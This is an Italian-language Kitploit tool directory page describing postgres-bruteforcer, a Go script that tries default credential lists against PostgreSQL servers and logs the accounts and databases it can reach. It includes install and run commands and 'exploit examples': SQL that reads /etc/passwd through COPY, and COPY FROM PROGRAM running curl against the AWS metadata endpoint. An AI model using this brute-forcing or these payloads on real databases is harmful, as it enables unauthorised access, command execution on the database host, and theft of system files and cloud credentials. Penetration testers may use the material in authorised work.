Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
postgres-bruteforcer — Questo strumento prende un elenco di credenziali predefinite e le testa contro un server postgresql, registrando quelle che funzionano e i database a cui ha accesso. | Kitploit
Strumenti/GitHubGitHub/randomrobbiebf/postgres-bruteforcer
Attacchi alle PasswordExploitPenetration TestingAutenticazioneSicurezza dei Database
GitHubrandomrobbiebf/postgres-bruteforcer

postgres-bruteforcer

Questo strumento prende un elenco di credenziali predefinite e le testa contro un server postgresql, registrando quelle che funzionano e i database a cui ha accesso.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
223 anni faNon ancora revisionato

postgres-bruteforcer

Informazioni

Questo script Go legge un elenco di nomi utente e password da un file chiamato creds.txt e li testa contro un database PostgreSQL.

Lo script accetta un IP del server PostgreSQL come argomento della riga di comando oppure un file di testo contenente gli IP.

Se l'accesso viene concesso, lo script scrive questo output in un file chiamato pg-output.txt.

Se l'utente postgres è disponibile, di solito si tratta di un superutente che può consentire RCE, LFI o SSRF.

Come installare

root@kitploit:~
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest

Come eseguire

root@kitploit:~
go run postgres-brute.go 1.1.1.1

postgres

Esempi di exploit

Recupera /etc/passwd/

root@kitploit:~
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;

SSRF - Recupera i metadati AWS

root@kitploit:~
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;
Scarica lo strumento